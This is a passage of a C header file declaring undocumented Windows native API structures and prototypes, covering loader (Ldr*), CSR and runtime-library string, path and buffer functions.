DUMMYUNION1;\n union\n {\n ULONG TimeDateStamp;\n PVOID LoadedImports;\n } DUMMYUNION2;\n //fields below removed for compatibility, if you need them use LDR_DATA_TABLE_ENTRY_FULL\n} LDR_DATA_TABLE_ENTRY_COMPATIBLE, * PLDR_DATA_TABLE_ENTRY_COMPATIBLE;\ntypedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;\ntypedef LDR_DATA_TABLE_ENTRY_COMPATIBLE* PLDR_DATA_TABLE_ENTRY;\ntypedef LDR_DATA_TABLE_ENTRY* PCLDR_DATA_TABLE_ENTRY;\n\ntypedef BOOLEAN(NTAPI* PLDR_INIT_ROUTINE)(\n _In_ PVOID DllHandle,\n _In_ ULONG Reason,\n _In_opt_ PVOID Context\n );\n\ntypedef struct _LDR_SERVICE_TAG_RECORD\n{\n struct _LDR_SERVICE_TAG_RECORD* Next;\n ULONG ServiceTag;\n} LDR_SERVICE_TAG_RECORD, * PLDR_SERVICE_TAG_RECORD;\n\ntypedef struct _LDRP_CSLIST\n{\n PSINGLE_LIST_ENTRY Tail;\n} LDRP_CSLIST, * PLDRP_CSLIST;\n\ntypedef enum _LDR_DDAG_STATE\n{\n LdrModulesMerged = -5,\n LdrModulesInitError = -4,\n LdrModulesSnapError = -3,\n LdrModulesUnloaded = -2,\n LdrModulesUnloading = -1,\n LdrModulesPlaceHolder = 0,\n LdrModulesMapping = 1,\n LdrModulesMapped = 2,\n LdrModulesWaitingForDependencies = 3,\n LdrModulesSnapping = 4,\n LdrModulesSnapped = 5,\n LdrModulesCondensed = 6,\n LdrModulesReadyToInit = 7,\n LdrModulesInitializing = 8,\n LdrModulesReadyToRun = 9\n} LDR_DDAG_STATE;\n\ntypedef struct _LDR_DDAG_NODE\n{\n LIST_ENTRY Modules;\n PLDR_SERVICE_TAG_RECORD ServiceTagList;\n ULONG LoadCount;\n ULONG LoadWhileUnloadingCount;\n ULONG LowestLink;\n union\n {\n LDRP_CSLIST Dependencies;\n SINGLE_LIST_ENTRY RemovalLink;\n };\n LDRP_CSLIST IncomingDependencies;\n LDR_DDAG_STATE State;\n SINGLE_LIST_ENTRY CondenseLink;\n ULONG PreorderNumber;\n} LDR_DDAG_NODE, * PLDR_DDAG_NODE;\n\ntypedef enum _LDR_HOT_PATCH_STATE\n{\n LdrHotPatchBaseImage = 0,\n LdrHotPatchNotApplied = 1,\n LdrHotPatchAppliedReverse = 2,\n LdrHotPatchAppliedForward = 3,\n LdrHotPatchFailedToPatch = 4,\n LdrHotPatchStateMax = 5,\n} LDR_HOT_PATCH_STATE, * PLDR_HOT_PATCH_STATE;\n\n//\n// Full declaration of LDR_DATA_TABLE_ENTRY\n//\ntypedef struct _LDR_DATA_TABLE_ENTRY_FULL\n{\n LIST_ENTRY InLoadOrderLinks;\n LIST_ENTRY InMemoryOrderLinks;\n union\n {\n LIST_ENTRY InInitializationOrderLinks;\n LIST_ENTRY InProgressLinks;\n };\n PVOID DllBase;\n PLDR_INIT_ROUTINE EntryPoint;\n ULONG SizeOfImage;\n UNICODE_STRING FullDllName;\n UNICODE_STRING BaseDllName;\n union\n {\n UCHAR FlagGroup[4];\n ULONG Flags;\n struct\n {\n ULONG PackagedBinary : 1;\n ULONG MarkedForRemoval : 1;\n ULONG ImageDll : 1;\n ULONG LoadNotificationsSent : 1;\n ULONG TelemetryEntryProcessed : 1;\n ULONG ProcessStaticImport : 1;\n ULONG InLegacyLists : 1;\n ULONG InIndexes : 1;\n ULONG ShimDll : 1;\n ULONG InExceptionTable : 1;\n ULONG ReservedFlags1 : 2;\n ULONG LoadInProgress : 1;\n ULONG LoadConfigProcessed : 1;\n ULONG EntryProcessed : 1;\n ULONG ProtectDelayLoad : 1;\n ULONG ReservedFlags3 : 2;\n ULONG DontCallForThreads : 1;\n ULONG ProcessAttachCalled : 1;\n ULONG ProcessAttachFailed : 1;\n ULONG CorDeferredValidate : 1;\n ULONG CorImage : 1;\n ULONG DontRelocate : 1;\n ULONG CorILOnly : 1;\n ULONG ChpeImage : 1;\n ULONG ChpeEmulatorImage : 1;\n ULONG ReservedFlags5 : 1;\n ULONG Redirected : 1;\n ULONG ReservedFlags6 : 2;\n ULONG CompatDatabaseProcessed : 1;\n };\n };\n USHORT ObsoleteLoadCount;\n USHORT TlsIndex;\n LIST_ENTRY HashLinks;\n ULONG TimeDateStamp;\n PACTIVATION_CONTEXT EntryPointActivationContext;\n PVOID Lock;\n PLDR_DDAG_NODE DdagNode;\n LIST_ENTRY NodeModuleLink;\n PVOID LoadContext;\n PVOID ParentDllBase;\n PVOID SwitchBackContext;\n RTL_BALANCED_NODE BaseAddressIndexNode;\n RTL_BALANCED_NODE MappingInfoIndexNode;\n ULONG_PTR OriginalBase;\n LARGE_INTEGER LoadTime;\n ULONG BaseNameHashValue;\n LDR_DLL_LOAD_REASON LoadReason;\n ULONG ImplicitPathOptions;\n ULONG ReferenceCount;\n ULONG DependentLoadFlags;\n UCHAR SigningLevel;\n ULONG CheckSum; \n PVOID ActivePatchImageBase;\n LDR_HOT_PATCH_STATE HotPatchState;\n} LDR_DATA_TABLE_ENTRY_FULL, * PLDR_DATA_TABLE_ENTRY_FULL;\n\ntypedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {\n ULONG Flags; //Reserved.\n PCUNICODE_STRING FullDllName; //The full path name of the DLL module.\n PCUNICODE_STRING BaseDllName; //The base file name of the DLL module.\n PVOID DllBase; //A pointer to the base address for the DLL in memory.\n ULONG SizeOfImage; //The size of the DLL image, in bytes.\n} LDR_DLL_LOADED_NOTIFICATION_DATA, * PLDR_DLL_LOADED_NOTIFICATION_DATA;\n\ntypedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {\n ULONG Flags; //Reserved.\n PCUNICODE_STRING FullDllName; //The full path name of the DLL module.\n PCUNICODE_STRING BaseDllName; //The base file name of the DLL module.\n PVOID DllBase; //A pointer to the base address for the DLL in memory.\n ULONG SizeOfImage; //The size of the DLL image, in bytes.\n} LDR_DLL_UNLOADED_NOTIFICATION_DATA, * PLDR_DLL_UNLOADED_NOTIFICATION_DATA;\n\ntypedef union _LDR_DLL_NOTIFICATION_DATA {\n LDR_DLL_LOADED_NOTIFICATION_DATA Loaded;\n LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;\n} LDR_DLL_NOTIFICATION_DATA, * PLDR_DLL_NOTIFICATION_DATA;\ntypedef const LDR_DLL_NOTIFICATION_DATA* PCLDR_DLL_NOTIFICATION_DATA;\n\ntypedef VOID(NTAPI *PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION)(\n _In_ PCLDR_DATA_TABLE_ENTRY DataTableEntry,\n _In_ PVOID Context,\n _Inout_ BOOLEAN *StopEnumeration\n );\n\ntypedef VOID(CALLBACK *PLDR_DLL_NOTIFICATION_FUNCTION)(\n _In_ ULONG NotificationReason,\n _In_ PCLDR_DLL_NOTIFICATION_DATA NotificationData,\n _In_opt_ PVOID Context);\n\n#ifndef LDR_IS_DATAFILE\n#define LDR_IS_DATAFILE(DllHandle) (((ULONG_PTR)(DllHandle)) & (ULONG_PTR)1)\n#endif\n\n#ifndef LDR_IS_IMAGEMAPPING\n#define LDR_IS_IMAGEMAPPING(DllHandle) (((ULONG_PTR)(DllHandle)) & (ULONG_PTR)2)\n#endif\n\n#ifndef LDR_IS_RESOURCE\n#define LDR_IS_RESOURCE(DllHandle) (LDR_IS_IMAGEMAPPING(DllHandle) || LDR_IS_DATAFILE(DllHandle))\n#endif\n\n#ifndef IMAGE_FILE_MACHINE_CHPE_X86\n#define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64\n#endif\n\n#ifndef IMAGE_FILE_MACHINE_ARM64EC\n#define IMAGE_FILE_MACHINE_ARM64EC 0xA641\n#endif\n\n#ifndef IMAGE_FILE_MACHINE_ARM64X\n#define IMAGE_FILE_MACHINE_ARM64X 0xA64E\n#endif\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrAccessResource(\n _In_ PVOID DllHandle,\n _In_ CONST IMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry,\n _Out_opt_ PVOID *Address,\n _Out_opt_ PULONG Size);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrAddRefDll(\n _In_ ULONG Flags,\n _In_ PVOID DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrEnumerateLoadedModules(\n _In_ ULONG Flags,\n _In_ PLDR_LOADED_MODULE_ENUMERATION_CALLBACK_FUNCTION CallbackFunction,\n _In_opt_ PVOID Context);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrFindResource_U(\n _In_ PVOID DllHandle,\n _In_ CONST ULONG_PTR* ResourceIdPath,\n _In_ ULONG ResourceIdPathLength,\n _Out_ PIMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrFindResourceEx_U(\n _In_ ULONG Flags,\n _In_ PVOID DllHandle,\n _In_ PLDR_RESOURCE_INFO ResourceInfo,\n _In_ ULONG Level,\n _Out_ PIMAGE_RESOURCE_DATA_ENTRY* ResourceDataEntry);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrFindResourceDirectory_U(\n _In_ PVOID DllHandle,\n _In_ PLDR_RESOURCE_INFO ResourceInfo,\n _In_ ULONG Level,\n _Out_ PIMAGE_RESOURCE_DIRECTORY *ResourceDirectory);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrFindEntryForAddress(\n _In_ PVOID Address,\n _Out_ PLDR_DATA_TABLE_ENTRY *TableEntry);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllHandle(\n _In_opt_ PCWSTR DllPath,\n _In_opt_ PULONG DllCharacteristics,\n _In_ PCUNICODE_STRING DllName,\n _Out_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllHandleEx(\n _In_ ULONG Flags,\n _In_opt_ PWSTR DllPath,\n _In_opt_ PULONG DllCharacteristics,\n _In_ PUNICODE_STRING DllName,\n _Out_opt_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllHandleByMapping(\n _In_ PVOID BaseAddress,\n _Out_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllHandleByName(\n _In_opt_ PUNICODE_STRING BaseDllName,\n _In_opt_ PUNICODE_STRING FullDllName,\n _Out_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllFullName(\n _In_ PVOID DllHandle,\n _Out_ PUNICODE_STRING FullDllName);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetDllDirectory(\n _Out_ PUNICODE_STRING DllDirectory);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrSetDllDirectory(\n _In_ PUNICODE_STRING DllDirectory);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetProcedureAddress(\n _In_ PVOID DllHandle,\n _In_opt_ CONST ANSI_STRING* ProcedureName,\n _In_opt_ ULONG ProcedureNumber,\n _Out_ PVOID *ProcedureAddress);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetProcedureAddressForCaller(\n _In_ PVOID DllHandle,\n _In_opt_ PANSI_STRING ProcedureName,\n _In_opt_ ULONG ProcedureNumber,\n _Out_ PVOID *ProcedureAddress,\n _In_ ULONG Flags,\n _In_ PVOID *Callback);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetProcedureAddressEx(\n _In_ PVOID DllHandle,\n _In_opt_ PANSI_STRING ProcedureName,\n _In_opt_ ULONG ProcedureNumber,\n _Out_ PVOID* ProcedureAddress,\n _In_ ULONG Flags);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrGetKnownDllSectionHandle(\n _In_ PCWSTR DllName,\n _In_ BOOLEAN KnownDlls32,\n _Out_ PHANDLE Section);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrLoadDll(\n _In_opt_ PCWSTR DllPath,\n _In_opt_ PULONG DllCharacteristics,\n _In_ PCUNICODE_STRING DllName,\n _Out_ PVOID *DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrUnloadDll(\n _In_ PVOID DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrQueryProcessModuleInformation(\n _Out_ PRTL_PROCESS_MODULES ModuleInformation,\n _In_ ULONG ModuleInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrRegisterDllNotification(\n _In_ ULONG Flags,\n _In_ PLDR_DLL_NOTIFICATION_FUNCTION NotificationFunction,\n _In_opt_ PVOID Context,\n _Out_ PVOID *Cookie);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrUnregisterDllNotification(\n _In_ PVOID Cookie);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrResSearchResource(\n _In_ PVOID File,\n _In_ CONST ULONG_PTR* ResIds,\n _In_ ULONG ResIdCount,\n _In_ ULONG Flags,\n _Out_ LPVOID *Resource,\n _Out_ ULONG_PTR *Size,\n _In_opt_ USHORT *FoundLanguage,\n _In_opt_ ULONG *FoundLanguageLength);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrOpenImageFileOptionsKey(\n _In_ PCUNICODE_STRING ImagePathName,\n _In_ BOOLEAN Wow64Path,\n _Out_ PHANDLE KeyHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrQueryImageFileExecutionOptions(\n _In_ PCUNICODE_STRING ImagePathName,\n _In_ PCWSTR OptionName,\n _In_ ULONG Type,\n _Out_ PVOID Buffer,\n _In_ ULONG BufferSize,\n _Out_opt_ PULONG ResultSize);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nLdrIsModuleSxsRedirected( //LdrEntry->Flags->Redirected\n _In_ PVOID DllHandle);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrQueryImageFileExecutionOptionsEx(\n _In_ PCUNICODE_STRING ImagePathName,\n _In_ PCWSTR OptionName,\n _In_ ULONG Type,\n _Out_ PVOID Buffer,\n _In_ ULONG BufferSize,\n _Out_opt_ PULONG ResultSize,\n _In_ BOOLEAN Wow64Path);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrQueryImageFileKeyOption(\n _In_ HANDLE KeyHandle,\n _In_ PCWSTR OptionName,\n _In_ ULONG Type,\n _Out_ PVOID Buffer,\n _In_ ULONG BufferSize,\n _Out_opt_ PULONG ResultSize);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrDisableThreadCalloutsForDll(\n _In_ PVOID DllImageBase);\n\n#define LDR_LOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001\n#define LDR_LOCK_LOADER_LOCK_FLAG_TRY_ONLY 0x00000002\n\n#define LDR_LOCK_LOADER_LOCK_DISPOSITION_INVALID 0x00000000\n#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_ACQUIRED 0x00000001\n#define LDR_LOCK_LOADER_LOCK_DISPOSITION_LOCK_NOT_ACQUIRED 0x00000002\n\n#define LDR_UNLOCK_LOADER_LOCK_FLAG_RAISE_ON_ERRORS 0x00000001\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrLockLoaderLock(\n _In_ ULONG Flags,\n _Out_opt_ ULONG *Disposition,\n _Out_ PVOID *Cookie);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrUnlockLoaderLock(\n _In_ ULONG Flags,\n _Inout_ PVOID Cookie);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nLdrRelocateImage(\n _In_ PVOID NewBase,\n _In_opt_ PSTR LoaderName,\n _In_ NTSTATUS Success,\n _In_ NTSTATUS Conflict,\n _In_ NTSTATUS Invalid);\n\nNTSYSAPI\nPIMAGE_BASE_RELOCATION\nNTAPI\nLdrProcessRelocationBlock(\n _In_ ULONG_PTR VA,\n _In_ ULONG SizeOfBlock,\n _In_ PUSHORT NextOffset,\n _In_ LONG_PTR Diff);\n\nDECLSPEC_NORETURN\nNTSYSAPI\nVOID\nNTAPI\nLdrShutdownProcess(\n VOID);\n\nDECLSPEC_NORETURN\nNTSYSAPI\nVOID\nNTAPI\nLdrShutdownThread(\n VOID);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nLdrControlFlowGuardEnforced(\n VOID);\n\n/*\n** LDR END\n*/\n\n/*\n** Runtime Library API START\n*/\n\n/************************************************************************************\n*\n* CSR API.\n*\n************************************************************************************/\n\nNTSYSAPI\nULONG\nNTAPI\nCsrGetProcessId(\n VOID);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nCsrClientConnectToServer(\n _In_ PWSTR ObjectDirectory,\n _In_ ULONG ServerDllIndex,\n _Inout_ PVOID ConnectionInformation,\n _Inout_ ULONG *ConnectionInformationLength,\n _Out_ PBOOLEAN CalledFromServer);\n\n/************************************************************************************\n*\n* RTL Strings API.\n*\n************************************************************************************/\n\n#define RTL_DUPLICATE_UNICODE_STRING_NULL_TERMINATE (0x00000001)\n#define RTL_DUPLICATE_UNICODE_STRING_ALLOCATE_NULL_STRING (0x00000002)\n\n#ifndef RtlInitEmptyUnicodeString\n#define RtlInitEmptyUnicodeString(_ucStr,_buf,_bufSize) \\\n ((_ucStr)->Buffer = (_buf), \\\n (_ucStr)->Length = 0, \\\n (_ucStr)->MaximumLength = (USHORT)(_bufSize))\n#endif\n\nFORCEINLINE\nVOID\nNTAPI\nRtlInitEmptyAnsiString(\n _Out_ PANSI_STRING AnsiString,\n _Pre_maybenull_ _Pre_readable_size_(MaximumLength) PCHAR Buffer,\n _In_ USHORT MaximumLength\n)\n{\n memset(AnsiString, 0, sizeof(ANSI_STRING));\n AnsiString->MaximumLength = MaximumLength;\n AnsiString->Buffer = Buffer;\n}\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlCreateUnicodeString(\n _Out_ PUNICODE_STRING DestinationString,\n _In_ PCWSTR SourceString);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlCreateUnicodeStringFromAsciiz(\n _Out_ PUNICODE_STRING DestinationString,\n _In_ PSTR SourceString);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlInitString(\n _Out_ PSTRING DestinationString,\n _In_opt_ PCSZ SourceString);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlInitUnicodeString(\n _Out_ PUNICODE_STRING DestinationString,\n _In_opt_ PCWSTR SourceString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlInitUnicodeStringEx(\n _Out_ PUNICODE_STRING DestinationString,\n _In_opt_ PCWSTR SourceString);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlEqualUnicodeString(\n _In_ PCUNICODE_STRING String1,\n _In_ PCUNICODE_STRING String2,\n _In_ BOOLEAN CaseInSensitive);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDuplicateUnicodeString(\n _In_ ULONG Flags,\n _In_ PUNICODE_STRING StringIn,\n _Out_ PUNICODE_STRING StringOut);\n\nNTSYSAPI\nWCHAR\nNTAPI\nRtlUpcaseUnicodeChar(\n _In_ WCHAR SourceCharacter);\n\nNTSYSAPI\nWCHAR\nNTAPI\nRtlDowncaseUnicodeChar(\n _In_ WCHAR SourceCharacter);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlIsNameInExpression(\n _In_ PUNICODE_STRING Expression,\n _In_ PUNICODE_STRING Name,\n _In_ BOOLEAN IgnoreCase,\n _In_opt_ PWCH UpcaseTable);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlStringFromGUID(\n _In_ GUID *Guid,\n _Out_ PUNICODE_STRING GuidString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGUIDFromString(\n _In_ PUNICODE_STRING GuidString,\n _Out_ GUID *Guid);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlPrefixUnicodeString(\n _In_ PCUNICODE_STRING String1,\n _In_ PCUNICODE_STRING String2,\n _In_ BOOLEAN CaseInSensitive);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlFormatCurrentUserKeyPath(\n _Out_ PUNICODE_STRING CurrentUserKeyPath);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFreeUnicodeString(\n _In_ PUNICODE_STRING UnicodeString);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlEraseUnicodeString(\n _Inout_ PUNICODE_STRING String);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlFreeAnsiString(\n _In_ PANSI_STRING AnsiString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAnsiStringToUnicodeString(\n _Out_ PUNICODE_STRING DestinationString,\n _In_ PCANSI_STRING SourceString,\n _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlUnicodeStringToAnsiString(\n _Inout_ PANSI_STRING DestinationString,\n _In_ PUNICODE_STRING SourceString,\n _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nWCHAR\nNTAPI\nRtlAnsiCharToUnicodeChar(\n _Inout_ PUCHAR *SourceCharacter);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlUnicodeToMultiByteSize(\n _Out_ PULONG BytesInMultiByteString,\n _In_reads_bytes_(BytesInUnicodeString) PWCH UnicodeString,\n _In_ ULONG BytesInUnicodeString);\n\nNTSYSAPI\nBOOLEAN\nNTAPI\nRtlDosPathNameToNtPathName_U(\n _In_ PCWSTR DosFileName,\n _Out_ PUNICODE_STRING NtFileName,\n _Out_opt_ PWSTR *FilePart,\n _Reserved_ PVOID Reserved);\n\nNTSYSAPI\nLONG\nNTAPI\nRtlCompareUnicodeStrings(\n _In_reads_(String1Length) PWCHAR String1,\n _In_ SIZE_T String1Length,\n _In_reads_(String2Length) PWCHAR String2,\n _In_ SIZE_T String2Length,\n _In_ BOOLEAN CaseInSensitive);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlCopyString(\n _In_ PSTRING DestinationString,\n _In_opt_ PSTRING SourceString);\n\nNTSYSAPI\nCHAR\nNTAPI\nRtlUpperChar(\n _In_ CHAR Character);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlUpperString(\n _In_ PSTRING DestinationString,\n _In_ PSTRING SourceString);\n\nNTSYSAPI\nLONG\nNTAPI\nRtlCompareAltitudes(\n _In_ PCUNICODE_STRING Altitude1,\n _In_ PCUNICODE_STRING Altitude2);\n\n//\n// preallocated heap-growable buffers\n//\ntypedef struct _RTL_BUFFER {\n PUCHAR Buffer;\n PUCHAR StaticBuffer;\n SIZE_T Size;\n SIZE_T StaticSize;\n SIZE_T ReservedForAllocatedSize; // for future doubling\n PVOID ReservedForIMalloc; // for future pluggable growth\n} RTL_BUFFER, *PRTL_BUFFER;\n\ntypedef struct _RTL_UNICODE_STRING_BUFFER {\n UNICODE_STRING String;\n RTL_BUFFER ByteBuffer;\n UCHAR MinimumStaticBufferForTerminalNul[sizeof(WCHAR)];\n} RTL_UNICODE_STRING_BUFFER, *PRTL_UNICODE_STRING_BUFFER;\n\n//\n// These are OUT Disposition values.\n//\n#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_AMBIGUOUS (0x00000001)\n#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_UNC (0x00000002)\n#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_DRIVE (0x00000003)\n#define RTL_NT_PATH_NAME_TO_DOS_PATH_NAME_ALREADY_DOS (0x00000004)\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlNtPathNameToDosPathName(\n _In_ ULONG Flags,\n _Inout_ PRTL_UNICODE_STRING_BUFFER Path,\n _Out_opt_ PULONG Disposition,\n _Inout_opt_ PWSTR* FilePart);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlIsDosDeviceName_U(\n _In_ PCWSTR DosFileName);\n\nNTSYSAPI\nULONG\nNTAPI\nRtlGetFullPathName_U(\n _In_ PCWSTR lpFileName,\n _In_ ULONG nBufferLength,\n _Out_writes_bytes_(nBufferLength) PWSTR lpBuffer,\n _Out_opt_ PWSTR *lpFilePart);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlGetSearchPath(\n _Out_ PWSTR *SearchPath);\n\ntypedef enum _RTL_PATH_TYPE {\n RtlPathTypeUnknown, // 0\n RtlPathTypeUncAbsolute, // 1\n RtlPathTypeDriveAbsolute, // 2\n RtlPathTypeDriveRelative, // 3\n RtlPathTypeRooted, // 4\n RtlPathTypeRelative, // 5\n RtlPathTypeLocalDevice, // 6\n RtlPathTypeRootLocalDevice // 7\n} RTL_PATH_TYPE;\n\nNTSYSAPI\nRTL_PATH_TYPE\nNTAPI\nRtlDetermineDosPathNameType_U(\n _In_ PCWSTR DosFileName);\n\n#define HASH_STRING_ALGORITHM_DEFAULT (0)\n#define HASH_STRING_ALGORITHM_X65599 (1)\n#define HASH_STRING_ALGORITHM_INVALID (0xffffffff)\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlHashUnicodeString(\n _In_ const UNICODE_STRING *String,\n _In_ BOOLEAN CaseInSensitive,\n _In_ ULONG HashAlgorithm,\n _Out_ PULONG HashValue);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAppendUnicodeStringToString(\n _In_ PUNICODE_STRING Destination,\n _In_ PUNICODE_STRING Source);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlAppendUnicodeToString(\n _In_ PUNICODE_STRING Destination,\n _In_opt_ PWSTR Source);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlCopyUnicodeString(\n _In_ PUNICODE_STRING DestinationString,\n _In_ PUNICODE_STRING SourceString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlUpcaseUnicodeString(\n _Inout_ PUNICODE_STRING DestinationString,\n _In_ PUNICODE_STRING SourceString,\n _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlDowncaseUnicodeString(\n _Inout_ PUNICODE_STRING DestinationString,\n _In_ PUNICODE_STRING SourceString,\n _In_ BOOLEAN AllocateDestinationString);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlEraseUnicodeString(\n _Inout_ PUNICODE_STRING String);\n\n#define RTL_ENSURE_BUFFER_SIZE_NO_COPY (0x00000001)\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlpEnsureBufferSize(\n _In_ ULONG Flags,\n _Inout_ PRTL_BUFFER Buffer,\n _In_ SIZE_T NewSizeBytes);\n\n#define RtlInitBuffer(Buff, StatBuff, StatSize) \\\n do { \\\n (Buff)->Buffer = (StatBuff); \\\n (Buff)->Size = (StatSize); \\\n (Buff)->StaticBuffer = (StatBuff); \\\n (Buff)->StaticSize = (StatSize); \\\n } while (0)\n\n#define RtlEnsureBufferSize(Flags, Buff, NewSizeBytes) \\\n ( ((Buff) != NULL && (NewSizeBytes) <= (Buff)->Size) \\\n ? STATUS_SUCCESS \\\n : RtlpEnsureBufferSize((Flags), (Buff), (NewSizeBytes)) \\\n )\n\n#define RtlFreeBuffer(Buff) \\\n do { \\\n if ((Buff) != NULL && (Buff)->Buffer != NULL) { \\\n if (RTLP_BUFFER_IS_HEAP_ALLOCATED(Buff)) { \\\n UNICODE_STRING UnicodeString; \\\n UnicodeString.Buffer = (PWSTR)(PVOID)(Buff)->Buffer; \\\n RtlFreeUnicodeString(&UnicodeString); \\\n } \\\n (Buff)->Buffer = (Buff)->StaticBuffer; \\\n (Buff)->Size = (Buff)->StaticSize; \\\n } \\\n } while (0)\n\n\nNTSYSAPI\nVOID\nNTAPI\nRtlRunEncodeUnicodeString(\n _Inout_ PUCHAR Seed,\n _Inout_ PUNICODE_STRING String);\n\nNTSYSAPI\nVOID\nNTAPI\nRtlRunDecodeUnicodeString(\n _In_ UCHAR Seed,\n _Inout_ PUNICODE_STRING String);\n\n/************************************************************************************\n*\n* RTL Integer conversion API.\n*\n************************************************************************************/\n\nstruct in6_addr;\n\nNTSYSAPI\nPWSTR\nNTAPI\nRtlIpv4AddressToStringW(\n _In_ const struct in_addr *Addr,\n _Out_ PWSTR S);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlIpv4StringToAddressW(\n _In_ PCWSTR AddressString,\n _In_ BOOLEAN Strict,\n _Out_ LPCWSTR *Terminator,\n _Out_ struct in_addr *Address);\n\nNTSYSAPI\nPWSTR\nNTAPI\nRtlIpv6AddressToStringW(\n _In_ struct in6_addr*Address,\n _Out_writes_(46) PWSTR AddressString);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlIpv6StringToAddressW(\n _In_ PCWSTR AddressString,\n _Out_ PCWSTR * Terminator,\n _Out_ struct in6_addr*Address);\n\n//taken from ph2\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlIntegerToChar(\n _In_ ULONG Value,\n _In_opt_ ULONG Base,\n _In_ LONG OutputLength,\n _Out_ PSTR String);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlCharToInteger(\n _In_ PSTR String,\n _In_opt_ ULONG Base,\n _Out_ PULONG Value);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlLargeIntegerToChar(\n _In_ PLARGE_INTEGER Value,\n _In_opt_ ULONG Base,\n _In_ LONG OutputLength,\n _Out_ PSTR String);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nRtlIntegerToUnicodeString(\n _In_ ULONG Value,\n _In_opt_ ULONG Base,\n _Inout_ PUNICODE_STRING 